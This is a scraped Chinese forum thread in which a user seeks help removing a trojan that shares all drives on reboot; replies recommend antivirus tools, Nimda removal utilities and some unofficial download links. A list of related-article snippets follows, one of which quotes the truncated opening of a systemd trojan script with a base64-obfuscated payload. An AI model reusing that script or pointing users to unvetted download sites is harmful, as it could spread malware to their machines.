-
等级
本版专家分:45结帖率 100% -
机子里面有木马,每次重启就会把我的所有盘全部共享。我用木马终结者查出来有木马,在D盘但不知道是什么文件,因为软件没有注册,不能杀掉,用LOCKDOWN查没有查到。请问是什么木马,如何查杀。展开阅读全文
-
等级
本版专家分:216 -
这个很简单,
这是Norton中文企业版本单机黄金版(也就是客户端黄金版)
强大的杀毒防护工具,最新版本完美支持WindowsXP,中文企业版无任何省级时间限制!更安全、更有效地保护您的系统不受病毒的侵害。非常好的网络杀毒软件!
下载地址:http://www.sandflee.net/down/show.asp?id=231&down=1
记住在安装好以后一定要去更新最新的病毒包,这样才可以更安全的保护你的电脑,如果你的网速太慢的话,我建议你去NORTON的官方站点用工具下载它的最新病毒包程序。
官方站点病毒包下载地址:http://securityresponse.symantec.com/avcenter/download/pages/US-N95.html
下一个xxxxxxx-xxx-x86.exe和xxxxxxxx-xxxx-i32.exe
x代表它最新发布病毒包的日期。
-
等级
本版专家分:40 -
lockdown看看有没有不正常端口打开,再用防火墙看看这个端口捆绑哪个应用程序,看看注册表启动项的健值,若还是不行,很有可能是现在比较流行的远程线程插入技术实现的木马,但至少可以看见监听端口,捆绑的程序很有可能
是系统程序,比如:win2k的inetinfo等等
-
等级
本版专家分:35262勋章
-
-
红花
2002年8月 Windows专区大版内专家分月排行榜第一
2002年7月 Windows专区大版内专家分月排行榜第一
2002年6月 Windows专区大版内专家分月排行榜第一
-
-
黄花
2002年9月 Windows专区大版内专家分月排行榜第二
2002年8月 专题开发/技术/项目大版内专家分月排行榜第二
-
-
蓝花
2002年5月 Windows专区大版内专家分月排行榜第三
2003年6月 硬件/嵌入开发大版内专家分月排行榜第三
2002年5月 专题开发/技术/项目大版内专家分月排行榜第三
-
-
尼姆 达
你 可 以 用 木马 克 星 先 干掉 它 的 进 程,
,然后 你 再 把 文件删除
然后再 改 注册表
-
等级
本版专家分:35262勋章
-
-
红花
2002年8月 Windows专区大版内专家分月排行榜第一
2002年7月 Windows专区大版内专家分月排行榜第一
2002年6月 Windows专区大版内专家分月排行榜第一
-
-
黄花
2002年9月 Windows专区大版内专家分月排行榜第二
2002年8月 专题开发/技术/项目大版内专家分月排行榜第二
-
-
蓝花
2002年5月 Windows专区大版内专家分月排行榜第三
2003年6月 硬件/嵌入开发大版内专家分月排行榜第三
2002年5月 专题开发/技术/项目大版内专家分月排行榜第三
-
-
尼 姆达 的 杀 法 不 是 那 样 的
木马 的 杀 法 才 是 那 样 的
-
等级
本版专家分:127
-
www.sq88.com
http://61.138.196.132/sq88/down/show.asp?id=329
-
等级
本版专家分:45
-
LOCKDOWN没有用,木吗终结者也没有用。
-
等级
本版专家分:154
-
去网上找个尼姆达的专杀工具
-
等级
本版专家分:762 -
lockdown不是很好用。
我用checkit firewall,还有blackice也不错。
-
等级
本版专家分:2446勋章
-
-
红花
2004年12月 其他开发语言大版内专家分月排行榜第一
2003年3月 其他开发语言大版内专家分月排行榜第一
2003年2月 其他开发语言大版内专家分月排行榜第一
2003年1月 其他开发语言大版内专家分月排行榜第一
-
- 黄花 2002年12月 其他开发语言大版内专家分月排行榜第二
-
-
蓝花
2004年11月 其他开发语言大版内专家分月排行榜第三
2004年10月 其他开发语言大版内专家分月排行榜第三
-
-
如果是nimda的话,还是到金山毒霸www.iduba.net去下载个专杀工具比较有效!在查杀之前最好先暂停或关闭其它的病毒防火墙。
-
等级
本版专家分:154
-
是完全共享吗?应该是nimda病毒
用nimda的专杀工具就行了
- 木马问题解决方案
最近一个刚完工的一个单位在向我们反应遇到一个奇怪的问题,说是一个VLAN机经常会出现一些机子不能上网的情况,但不一定是哪台机子,有时候是这台,有时候是其它的一台,但都在一个VLAN内,而且反应,在PING网关的...
- systemd木马问题解决
文章目录木马解决木马文件清除木马的脚本 木马解决 木马文件 #!/bin/bash exec &>/dev/null sleep 167 echo ZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDovYmluOi9zYmluOi91c3IvYmluOi91c3Ivc2...
- 记一次阿里云木马排查过程
问题描述 接到阿里云报警邮件,说是一台ECS有恶意进程。查看阿里云的安全详情,发现如下情况: 登录到服务器上检查/bin目录,发现该文件确实不对,大小变成的1.1M,类似的还有netstat。如下图: 正常ubuntu系统下...
- 木马核心技术剖析读书笔记之木马实例解析
模块化的木马系统架构 被控端是整个木马的核心,它包含 Dropper 与常驻模块两部分 Dropper Dropper 是木马在植入过程中执行的组件,只在目标机器上执行一次,然后自行删除。Dropper 首先判断系统环境,如果...
- 介绍一下常见的木马种类
目前常见的木马有三种:正向连接木马、反弹连接木马、收信木马。正向连接木马,所谓正向,就是在中马者在机器上开个端口,而我们去连接他的端口。而我们要知道他的IP,才能够连接他。123就是他机器上开的端口。由于...
- 360卫士监测出APP有木马问题
自己开发的APP安装时,手机360安全卫士提示有木马病毒问题。
- 解决两种比特币挖矿工木马问题
服务器cpu一直跑高,通过执行top命令,发现有一个叫wnTKYg的进程排行第一,上网搜了一下是挖矿木马,也有对应的解决方案,照做就好 当时还有一个bashd的进程,没太在意,以为是系统内置的进程,过了几天竟然也飚到...
- 关于SQL企业管理器:作业中添加了一个叫x的作业的木马问题(转)
原文 http://myeblog.3322.org/1215.html 1、这个是有一个木马造成的。 你看一下,c:/windows/system32下是否有多个64K的xml文件(转载备注:我搜到一个叫sysS.xml的文件,用ue打开却是一个改了扩展名的access文
- 芯片中的硬件木马:X86 CPU到底存在哪些安全风险?
从海湾战争中萨达姆的防空系统突然瘫痪,到2007年以色列轰炸叙利亚东北部的一处潜在核设施时,叙利亚预警雷达因通用处理器后门而失效,再到2012年伊朗布什尔核电站在信息系统物理隔绝的情况下遭到震网病毒的攻击.......
- 企业PC终端安全问题分析及整改措施
第一次写技术文章,简单介绍下自己。我是90后,从事网络、安全行业将近6年,现在某市级单位负责网络安全,带着个小团队,主要维护、优化全市下级单位网络,搭建本单位的网络安全体系。一路以来的心路历程除了艰辛...
- 手动编写木马
使用C++实现一个简单的木马,实现木马的远程控制功能,...这是一个老生常谈的问题,木马(Trojan)这个名字来源于古希腊传说(荷马史诗中木马计的故事,Trojan一词的本意是特洛伊的,即代指特洛伊木马,也就是木马...
- 数据库select语句写入一句话木马遇到的问题
问题1:window服务器上,遇到了 The MySQL server is running with the --secure-file-priv option so it cannot execute this statement错误。 原因:my.ini配置文件没有secure-file-priv=,或者是secure-file-priv=...
- 网站安全问题针对一句话木马函数的普析与防范
本文内容转载于Sinesafe网站安全服务http://www.sinesafe.com/article/20180608/244.htmlPHP网站安全防一句话木马入侵一、首先是菜刀一句话木马: 菜刀一句话木马的原理是调用了PHP的代码执行函数,比如以下1和2两...
- 在看试验php木马是遇到的问题
服务端,1.php文件中有客户端文件echo 'ddd';在提交的时候,并不是提交的echo ‘ddd’;而是提交的echo /'ddd/';于是会报错, 我靠, 这也可以啊
- 一句话php木马制作教程_菜刀无法正常访问一句话问题
为了图操作上的方便,给自己的web放了一句话木马。但是当我打开菜刀连接时,报了500错误,如图想到可能是php版本问题导致这个问题的。查看了一下服务器上的php版本,7.0.33抓包查看菜刀数据: 去掉z0数据访问正常 ...
- 恢复或重装系统后仍不能清除病毒木马问题解决方法
原因:重装系统后又马上感染病毒主要是电脑硬盘里还有病毒或没有清除干净或是没有安装防护软件又开始上网了 要按照如下步骤做方能完全清除 1.重新下载好杀毒软件(如:卡巴斯基)和360安全卫士,并把它们放在d:Ps:不要...
- 【挖矿木马】记一次被挖矿木马攻击的过程(Redis被攻击)
不会吧,不会吧,不会2020年了还有人中挖矿木马吧。 0x01.事情经过: 关于这台服务器:我有一台阿里云的服务器(不是学生机)专门拿来做项目测试用的,部署好一些我经常需要用的组件后,平常就没怎么管过。阿里云...
- 【安全脚本】 centos 下的病毒木马查杀脚本
病毒木马查杀脚本使用的是clamAV , 它是开源工具包,用于检测特洛伊木马,病毒,恶意软件,以及其他威胁。 特点: 安装使用简单,在centos6下yum安装即可,在centos7下也可以用yum,比6稍微复杂点 支持读写扫描 ...
- 手机木马远程控制复现
手机木马远程控制 1.实验涉及复现环境 Kali平台(Hack):192.168.0.101 Android模拟器(靶机1):192.168.0.106 Android魅族note2手机(靶机2):192.168.0.104 Java环境,.net环境构建 。...
- 解决redis中的pnscan木马入侵问题
1、杀掉进程 top 找到pnscan 的pid kill -9 pid2、删除文件 找到进程对应的文件 ps aux|grep pnscan 删掉文件。注:redis启动一定要设置密码。在redis.conf 中 requirepass XXX...
- 记一次挖矿木马清除过程
今天,在参加ISC2019大会好好的,听着大佬在台上吹比。 忽然,微信响了,一个好久不见的朋友突然问我在不在,我觉得事有蹊跷,果不然,他公司的大数据集群被黑客用来挖矿了。出于好心,我准备晚上回家帮他处理。...
- Linux下手动查杀木马
一、 模拟木马程序病原体并让木马程序自动运行 黑客让脚本自动执行的三种方法: 计划任务,crontab;开机启动;系统命令被替换,使用命令后被触发。 1、 生成木马程序病原体 [root@xuegod120 ~]# vim /usr/bin/...
- [网络安全自学篇] 九十.远控木马详解及APT攻击中的远控
这篇文章将详细分享远控木马及APT攻击中的远控,包括木马的基本概念和分类、木马的植入方式、远控木马的通信方式、APT攻击与远控木马等。作者之前分享了多篇木马的文章,但这篇更多是讲解远控型木马,基础性文章,...
- windows下,病毒和木马的问题
windows下,病毒,木马是一个服务,还是隐藏了界面的窗体程序。 近来学一下病毒,木马的编程,现在还在学习简单的api。看到windows消息这块,涉及不少与界面有关的api,我想跳过不学界面的内容。我本来是会c#做个...
- 木马核心技术剖析读书笔记之木马免杀
免杀原理 基于特征码的检测 基于病毒特征码的检测方法,是目前反病毒软件最常用的检测技术。经过长时间的收集与积累,反病毒软件建立了庞大的已知病毒的特征数据库。在对可疑软件进行检测时,会从特征数据库中...
- 一款远控木马分析
文章目录说明:*注意:*一、样本信息:二、分析环境及工具:三、基础病毒分析:基础静态分析:基础动态分析:四、详细病毒分析:18xxxxxxxxxxxxxxxxxxxxxxxxxxxxx.exe分析:rat.exe分析:resource.exe分析:五、病毒...
- 木马程序的制作
0x0:想必大家都听说过计算机病毒或者木马吧,看着电影里面的黑客敲几下键盘就能控制你的系统,窃取你的隐私资料,执行任意命令,很炫酷吧,其实这种技术不难实现,接下来我就带领大家来玩一玩木马的制作. ...
- 关于 Inno Setup 报木马的问题处理
用 Inno Setup 生成的安装包总是报木马,尝试了N次之后发现,把Compression=lzma 改为Compression=zip 就不会再报了,可能lzma的压缩算法导致delphi的部分代码畸形了。 转载于:...
- 内核级木马与病毒攻防:windows恶意代码分析入门
本节帮助读者入门windows上如何对恶意软件或病毒做初步分析。分析分两种,一种叫静态分析,也就是通过直接读取病毒或恶意程序的可执行文件来分析它的运行原理,一种是动态分析,也就是在病毒或恶意程序正在运行的...
- 木马病毒分析笔记
1.样本概况 1.1样本信息 文件: C:\Users\86134\Desktop\火\02156056304b0ef8122f0363efee43ec64013dfe.exe 大小: 57344 bytes 文件版本:1.00 修改时间: 2020年4月21日, 12:23:06 MD5: 26D9D3DE6426BB6F9D5F6B4039C3A...